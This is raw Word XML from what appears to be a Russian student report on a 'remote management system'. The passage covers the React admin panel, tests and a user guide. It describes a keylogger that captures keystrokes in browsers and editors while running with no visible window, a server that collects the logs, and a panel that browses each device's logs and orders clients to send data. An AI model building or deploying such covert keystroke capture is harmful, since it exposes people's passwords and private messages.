      </w:r>
    </w:p>
    <w:p w14:paraId="2A6EAE0C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>Header — шапка интерфейса, содержащая информацию о текущем сеансе и управляющие элементы;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A41680" w14:textId="77777777" w:rsidR="00991484" w:rsidRPr="00991484" w:rsidRDefault="00991484" w:rsidP="00991484">
      <w:pPr>
        <w:pStyle w:val="af1"/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>ViewPanel — панель просмотра логов выбранного устройства с возможностью их обновления, очистки и визуального форматирования.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EFAEE4" w14:textId="77777777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 xml:space="preserve">Данные с сервера получаются асинхронно с использованием библиотеки Axios, поддерживающей промис-интерфейс и автоматическую обработку ошибок. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EB10B6" w14:textId="3BE10E55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Интерфейс реализует два ключевых сценария:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B0D5E0" w14:textId="1B8A089C" w:rsidR="0099148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з</w:t>
      </w:r>
      <w:r w:rsidR="00991484" w:rsidRPr="00991484">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">агрузка списка подключённых устройств: при старте и по запросу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>пользователь</w:t>
      </w:r>
      <w:r w:rsidR="00991484" w:rsidRPr="00991484">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> может получить актуальный список клиентов, отсылавших логи. Каждый элемент списка интерактивен — клик по нему загружает соответствующий лог-файл.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42837C0C" w14:textId="2C6AEE54" w:rsidR="00F66EB4" w:rsidRDefault="00F66EB4" w:rsidP="00991484">
      <w:pPr>
        <w:pStyle w:val="af1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р</w:t>
      </w:r>
      <w:r w:rsidRPr="00991484">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>абота с логами конкретного клиента: выбранное устройство</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678328B5" w14:textId="77777777" w:rsidR="00F66EB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отображает содержимое файла, который предварительно </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBD833E" w14:textId="77777777" w:rsidR="00F66EB4" w:rsidRPr="00991484" w:rsidRDefault="00F66EB4" w:rsidP="00F66EB4">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="1429" w:firstLine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 xml:space="preserve">форматируется для удобства восприятия. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B26AED" w14:textId="77777777" w:rsidR="00991484" w:rsidRP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Для повышения эффективности работы с данными реализованы управляющие команды, передаваемые через HTTP POST-запросы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5E801B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>sendData — инициирует немедленную отправку логов от конкретного клиента;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A69EFFE" w14:textId="77777777" w:rsidR="00991484" w:rsidRPr="00991484" w:rsidRDefault="00991484" w:rsidP="00991484">
      <w:pPr>
        <w:pStyle w:val="af1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Cs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00991484">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>refreshAll — обновляет список клиентов и логи от всех устройств одновременно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0990E1" w14:textId="46F7AD4F" w:rsidR="00991484" w:rsidRDefault="00991484" w:rsidP="00991484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 w:rsidRPr="00991484">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Таким образом, административный интерфейс представляет собой интуитивно понятный и функционально насыщенный инструмент удалённого мониторинга, обеспечивающий прямое взаимодействие с клиентскими агентами и прозрачное управление данными в реальном времени. Благодаря React и модульному подходу, интерфейс легко расширяется и адаптируется под новые</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> сценарии работы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184ECB23" w14:textId="77777777" w:rsidR="002B6258" w:rsidRPr="009429E8" w:rsidRDefault="002B6258" w:rsidP="009429E8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 w14:paraId="50CFE4E5" w14:textId="77777777" w:rsidR="00D137E1" w:rsidRDefault="00D137E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</w:p>
    <w:p w14:paraId="528D0B05" w14:textId="77777777" w:rsidR="00D71010" w:rsidRP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8"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07EC92E4" w14:textId="77777777" w:rsidR="00D71010" w:rsidRDefault="00D71010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19CBE0AA" w14:textId="77777777" w:rsidR="002A02FE" w:rsidRPr="00D71010" w:rsidRDefault="002A02FE" w:rsidP="000B75DC">
      <w:pPr>
        <w:pStyle w:val="af1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 w14:paraId="3D769733" w14:textId="77777777" w:rsidR="003C3B41" w:rsidRDefault="00EB3284" w:rsidP="003C3B41">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="670" w:firstLine="39"/>
        <w:contextualSpacing w:val="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D71010">
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00350927">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00D71010">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003C3B41" w:rsidRPr="003C3B41">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">ТЕСТИРОВАНИЕ, ПРОВЕРКА РАБОТОСПОСОБНОСТИ И </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09935746" w14:textId="77777777" w:rsidR="00BB7EA0" w:rsidRDefault="003C3B41" w:rsidP="003C3B41">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1379" w:firstLine="39"/>
        <w:contextualSpacing w:val="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3B41">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>АНАЛИЗ ПОЛУЧЕННЫХ РЕЗУЛЬТАТОВ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7487C070" w14:textId="77777777" w:rsidR="003C3B41" w:rsidRDefault="003C3B41" w:rsidP="000B75DC">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="670"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="021F0044" w14:textId="77777777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Для проверки функционирования всей системы удалённого управления были проведены комплексные тесты каждого из трёх компонентов: кейлоггера, серверной части и административного интерфейса. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F771D1" w14:textId="700C77F6" w:rsid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>Целью тестирования являлась проверка корректности работы всех модулей как по отдельности, так и в составе единой системы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296306F7" w14:textId="77777777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</w:p>
    <w:p w14:paraId="060F521F" w14:textId="50919D93" w:rsidR="00092D40" w:rsidRPr="00092D40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1. Тестирование кейлоггера </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693096F6" w14:textId="4995CA58" w:rsidR="00773E0A" w:rsidRDefault="00092D40" w:rsidP="00092D40">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00092D40">
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Были проведены тесты перехвата клавиатурных событий в различных приложениях: браузерах, текстовых редакторах, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">проводнике </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00092D40">
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12806D16" w14:textId="77777777" w:rsidR="00773E0A" w:rsidRDefault="00773E0A" w:rsidP="00092D40">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14CE1447" w14:textId="0D92B334" w:rsidR="00092D40" w:rsidRDefault="00092D40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0D7BED52" wp14:editId="4413B928">
            <wp:extent cx="5676900" cy="14013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089" cy="140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9181" w14:textId="77777777" w:rsidR="003E66E3" w:rsidRPr="00092D40" w:rsidRDefault="003E66E3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0DBA1EF8" w14:textId="37C6615A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После</w:t>
      </w:r>
      <w:r w:rsidR="00092D40" w:rsidRPr="00092D40">
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> запуска окно кейлоггера не отображается, процесс присутствует в диспетчере задач без явных признаков активности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3842DB9F" w14:textId="2530E038" w:rsidR="00092D40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70E62792" wp14:editId="4889099E">
            <wp:extent cx="2695951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61E" w14:textId="6878A76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1 – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Процесс кейлоггера в диспетчера задач</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BBE5F9" w14:textId="7E727871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088371FA" w14:textId="35B83F1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85922D4" w14:textId="0E9A182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9E453F" w14:textId="7AD365F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AFC8E87" w14:textId="65F48F02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721F21E1" w14:textId="2F63B2F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1ED696AA" w14:textId="295EA9D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FA550ED" w14:textId="741E6F0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E977FEB" w14:textId="251342C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EF47433" w14:textId="331AA810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20AE3812" w14:textId="56A9BE3D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8F410BD" w14:textId="5632EFA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B3BDA49" w14:textId="0231F6BE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1D390CB" w14:textId="77777777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5F167BCA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486A5AE" w14:textId="0B2A851F" w:rsidR="00092D40" w:rsidRDefault="00773E0A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2</w:t>
      </w:r>
      <w:r w:rsidR="00092D40" w:rsidRPr="00092D40">
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>. Тестирование серверной части</w:t>
      </w:r>
      <w:r w:rsidRPr="00773E0A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и </w:t>
      </w:r>
      <w:r w:rsidRPr="00092D40">
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>административного интерфейса</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7941B400" w14:textId="7777777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</w:p>
    <w:p w14:paraId="6C79F79E" w14:textId="3B7C8D27" w:rsidR="004C0D27" w:rsidRDefault="004C0D27" w:rsidP="00092D40">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Данные успешно пришли от клиента и корректно отображаются</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0D27">
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70892745" w14:textId="77777777" w:rsidR="00E342E4" w:rsidRDefault="00773E0A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9B64A" wp14:editId="166EF726">
            <wp:extent cx="5279366" cy="26283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846" cy="26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12" w:rsidRPr="002D5212">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D83BF02" w14:textId="77777777" w:rsidR="00E342E4" w:rsidRDefault="00E342E4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61C0E58" w14:textId="58B471EF" w:rsidR="002D5212" w:rsidRDefault="002D5212" w:rsidP="002D521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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2664AC54" w14:textId="77777777" w:rsidR="00773E0A" w:rsidRPr="00092D40" w:rsidRDefault="00773E0A" w:rsidP="00092D40">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46678C10" w14:textId="1BDB8CF3" w:rsidR="00773E0A" w:rsidRDefault="00773E0A" w:rsidP="004C0D27">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:ind w:left="0"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>Также данные отображаются и на мобильном устройстве</w:t>
      </w:r>
      <w:r w:rsidR="004C0D27" w:rsidRPr="004C0D27">
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E442546" w14:textId="382FB605" w:rsidR="00773E0A" w:rsidRDefault="00773E0A" w:rsidP="00773E0A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="389A6100" wp14:editId="73E12B35">
            <wp:extent cx="1958196" cy="3510322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600" cy="35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CCA2" w14:textId="77777777" w:rsidR="00E342E4" w:rsidRDefault="00E342E4" w:rsidP="00773E0A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="468D14F9" w14:textId="624379C1" w:rsidR="002D5212" w:rsidRDefault="002D5212" w:rsidP="00773E0A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Рисунок 5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Отображение данных</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> на мобильном устройстве</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A297456" w14:textId="77777777" w:rsidR="002D5212" w:rsidRDefault="002D5212" w:rsidP="00773E0A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58ABB1BB" w14:textId="42C7F491" w:rsidR="00092D40" w:rsidRPr="00092D40" w:rsidRDefault="00092D40" w:rsidP="00773E0A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00092D40">
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Сервер успешно обрабатывает одновременные подключения, корректно идентифицирует клиентов по имени пользователя, распределяет команды и сохраняет данные без потерь</w:t>
      </w:r>
      <w:r w:rsidR="00773E0A">
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, а интерфейс корректно выводит все эти данные в удобном формате для всех типов устройств</w:t>
      </w:r>
      <w:r w:rsidRPr="00092D40">
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042898D9" w14:textId="52910532" w:rsidR="00A60EF2" w:rsidRPr="00AC7F48" w:rsidRDefault="00D040DB" w:rsidP="00092D40">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
        <w:t>РУКОВОДСТВО ПОЛЬЗОВАТЕЛЯ</w:t>
      </w:r>
      <w:r w:rsidR="00AC7F48">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> ПРОГРАММЫ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247C5C9B" w14:textId="77777777" w:rsidR="00A60EF2" w:rsidRDefault="00A60EF2" w:rsidP="000B75DC">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="670"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51F95A62" w14:textId="5C756B05" w:rsidR="00B93E18" w:rsidRPr="005A6B01" w:rsidRDefault="006B02F9" w:rsidP="000B75DC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ьзования приложением </w:t>
      </w:r>
      <w:r w:rsidR="000C0697">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">необходимо в браузере ввести адрес приложения (в случае запуска на локальном компьютере </w:t>
      </w:r>
      <w:r w:rsidR="000C0697">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:softHyphen/>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="000C0697" w:rsidRPr="000C0697">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://localhost:</w:t>
      </w:r>
      <w:r w:rsidR="005A6B01" w:rsidRPr="005A6B01">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3000</w:t>
      </w:r>
      <w:r w:rsidR="000C0697" w:rsidRPr="000C0697">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="000C0697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5A6B01">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Пользователь попадает </w:t>
      </w:r>
      <w:r w:rsidR="005A6B01" w:rsidRPr="005A6B01">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>на главную страницу веб-интерфейса, где отображается список подключённых клиентов</w:t>
      </w:r>
      <w:r w:rsidR="00E54250">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660D44A8" w14:textId="77777777" w:rsidR="000C0697" w:rsidRDefault="000C0697" w:rsidP="00E54250">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="260FBFD1" w14:textId="50906BD6" w:rsidR="000C0697" w:rsidRPr="000C0697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85E1A9" wp14:editId="5ED45A3C">
            <wp:extent cx="5911742" cy="2943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110" cy="29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626" w14:textId="350A6232" w:rsidR="000C0697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 – Вид </w:t>
      </w:r>
      <w:r w:rsidR="00E54250">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>главной страницы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A65E94F" w14:textId="62B47109" w:rsidR="00E54250" w:rsidRDefault="00E54250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F615158" w14:textId="2A0CF732" w:rsidR="00E54250" w:rsidRDefault="00E54250" w:rsidP="00E54250">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E54250">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>С помощью панели навигации пользователь может просматривать зарегистрированные устройства</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAD35C0" w14:textId="77777777" w:rsidR="000C0697" w:rsidRPr="00960026" w:rsidRDefault="000C0697" w:rsidP="000C0697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31F3C757" w14:textId="17574C72" w:rsidR="00960026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1AC3C" wp14:editId="74995342">
            <wp:extent cx="2809524" cy="34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BB90" w14:textId="7920A2F1" w:rsidR="00E54250" w:rsidRDefault="00E54250" w:rsidP="00E54250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 навигации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11838E33" w14:textId="77777777" w:rsidR="00E54250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данной панели можно узнать о количестве подключенных устройств на данных момент. Также, нажав на кнопку обновления, выполнится запрос к серверу и список обновиться.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B0FA16" w14:textId="77777777" w:rsidR="00514D82" w:rsidRDefault="00E54250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Снизу находится кнопка, которая осуществляет запрос на обновление данных сразу на все доступные устройства.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E90ECBD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 Также можно нажать на имя, любого из предоставленных устройств, и тогда будет выполнен запрос к серверу, получены логи</w:t>
      </w:r>
      <w:r w:rsidRPr="00514D82">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidRPr="00514D82">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>данного</w:t>
      </w:r>
      <w:r w:rsidRPr="00514D82">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>устройства</w:t>
      </w:r>
      <w:r w:rsidRPr="00514D82">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и они будут выведены на экран в панели </w:t>
      </w:r>
      <w:r w:rsidRPr="00514D82">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Logs</w:t>
      </w:r>
      <w:r w:rsidRPr="00514D82">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684EC069" w14:textId="77777777" w:rsidR="00514D82" w:rsidRDefault="00514D82" w:rsidP="000B75DC">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A9645AF" w14:textId="72DC25C8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6C973" wp14:editId="4DA740A0">
            <wp:extent cx="5543550" cy="275991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545" cy="27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D82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6.</w:t>
      </w:r>
      <w:r w:rsidRPr="00514D82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логов для выбранного устройства</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A25721" w14:textId="28F54F00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65E48DD0" w14:textId="518C4A11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ая программа в логах выделена жирным шрифтом, а также для удобства отделена линией.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6129169D" w14:textId="3D42423D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для каждого устройства доступны 3 кнопки. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F3F5AD" w14:textId="77777777" w:rsidR="00514D82" w:rsidRDefault="00514D82" w:rsidP="00514D82">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55307BA6" w14:textId="1A9C93C3" w:rsid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B244D5" wp14:editId="71076030">
            <wp:extent cx="1619048" cy="50476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051" w14:textId="77777777" w:rsidR="00514D82" w:rsidRPr="00514D82" w:rsidRDefault="00514D82" w:rsidP="00514D82">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61DA9BEC" w14:textId="1CDCE313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и для взаимодействия с устройством</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D54A89" w14:textId="4B991334" w:rsidR="00514D82" w:rsidRDefault="00514D82" w:rsidP="00514D82"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 w14:paraId="4A829CE4" w14:textId="5CF5D47D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обновления выполняет запрос к серверу для получения новых данных для данного устройства. В этом случае запрос к клиенту сервер не делает, а только возвращает логи из своего файлового хранилища. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D420FC" w14:textId="5DC07C91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торая кнопка также выполняет запрос к серверу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>для получения новых данных для данного устройства.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Но в данном случае сервер выполнит запрос к клиенту (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
